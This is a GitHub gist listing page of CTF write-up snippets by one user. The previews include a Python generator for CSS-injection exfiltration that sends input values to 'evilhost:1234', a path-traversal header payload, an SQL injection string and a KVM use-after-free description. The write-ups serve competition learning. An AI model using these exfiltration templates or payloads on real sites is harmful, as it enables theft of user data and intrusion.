Skip to content

Instantly share code, notes, and snippets.

View vladvis's full-sized avatar

vladvis

View GitHub Profile
@vladvis
vladvis / gen_css.py
Created December 22, 2019 11:03
import time
import requests
host = 'evilhost:1234'
start_template = 'input.sgn[value^="%02x"]{content:url(http://'+host+'/s/%02x);}'
triple_template = 'input.sgn[value*="%03x"]~button{--p%s:url(http://'+host+'/q/%03x);}'
timestamp_template = 'input.timestamp[value="%s"]{background:url(http://'+host+'/t/%s);}'
frames = '''button{animation:l1 35s;}
@vladvis
vladvis / ptth.md
Created May 29, 2019 15:24

ptth

We noticed that server logs debug info to the stdout. First idea was path traversal, because server stores files with the names from the requests: path = './' + eikooc + '/' + path Path traversal in the path didn't work at all, but eikooc (reversed cookie) was a user directory. So we sent such payload:

TEG / PTTH\1.1
eikooc: ../
@vladvis
vladvis / dotfree.md
Created July 30, 2018 23:48

dot free write-up

  • Firstly, we had try random url and got 404 with django's debug.
  • There was hint: "Using the URLconf defined in XSSWebSite.urls"
  • OK. This challenge is about XSS.
  • Then we noticed js on main page:
function lls(src) {
    var el = document.createElement('script');
    if (el) {
@vladvis
vladvis / kidvm.md
Created July 30, 2018 23:35

Kid VM write-up

  • Original executable loads 16-bit code to KVM and starts execute it.
  • Host process provides I/O interface and interface for memory management on host using vmcall and port I/O.
  • Guest can allocate, free and update memory buffers on host and in itself address space.
  • Host memory management interface is insecure, so it allows to free memory without nullification ptr and size. As result guest can trigger use-after-free and double-free.
void __fastcall free_buffer(__int16 mode, unsigned __int16 index)
{
    if ( index <= 0x10u )
@vladvis
vladvis / advertisement.md
Created July 30, 2018 16:50

advertisement write-up

  • "This platform is under protection. DO NOT hack it."
  • It means that we wouldn't hack it, we just try to hack it.
  • Submit ' or '1'='1 as flag and...
  • Request is rejected and site drops us to login page.
  • We notice the flag in redirect page
  • ?
  • Profit
@vladvis
vladvis / k3y.md
Created May 4, 2018 13:19

Write-up: k3y

Задание представляет из себя исполняемый ELF, написанный на Go. В нем пользователю предлагают ввести seed для рандома и флаг. Затем выводят набор из 20 слов в качестве подсказки.

Открываем бинарь в любимом виде и понимаем, что:

  • Флаг зашифрован AES-CFB с ключем и IV, сгенерированными на основе введенного seed.
  • Слова выбираются из массива из 115 слов с индексом rand.Randn(115).
  • Если ввести seed из шаблона (1337000900080091), то он выводит зашифрованный AES флаг и набор слов, для исходного seed.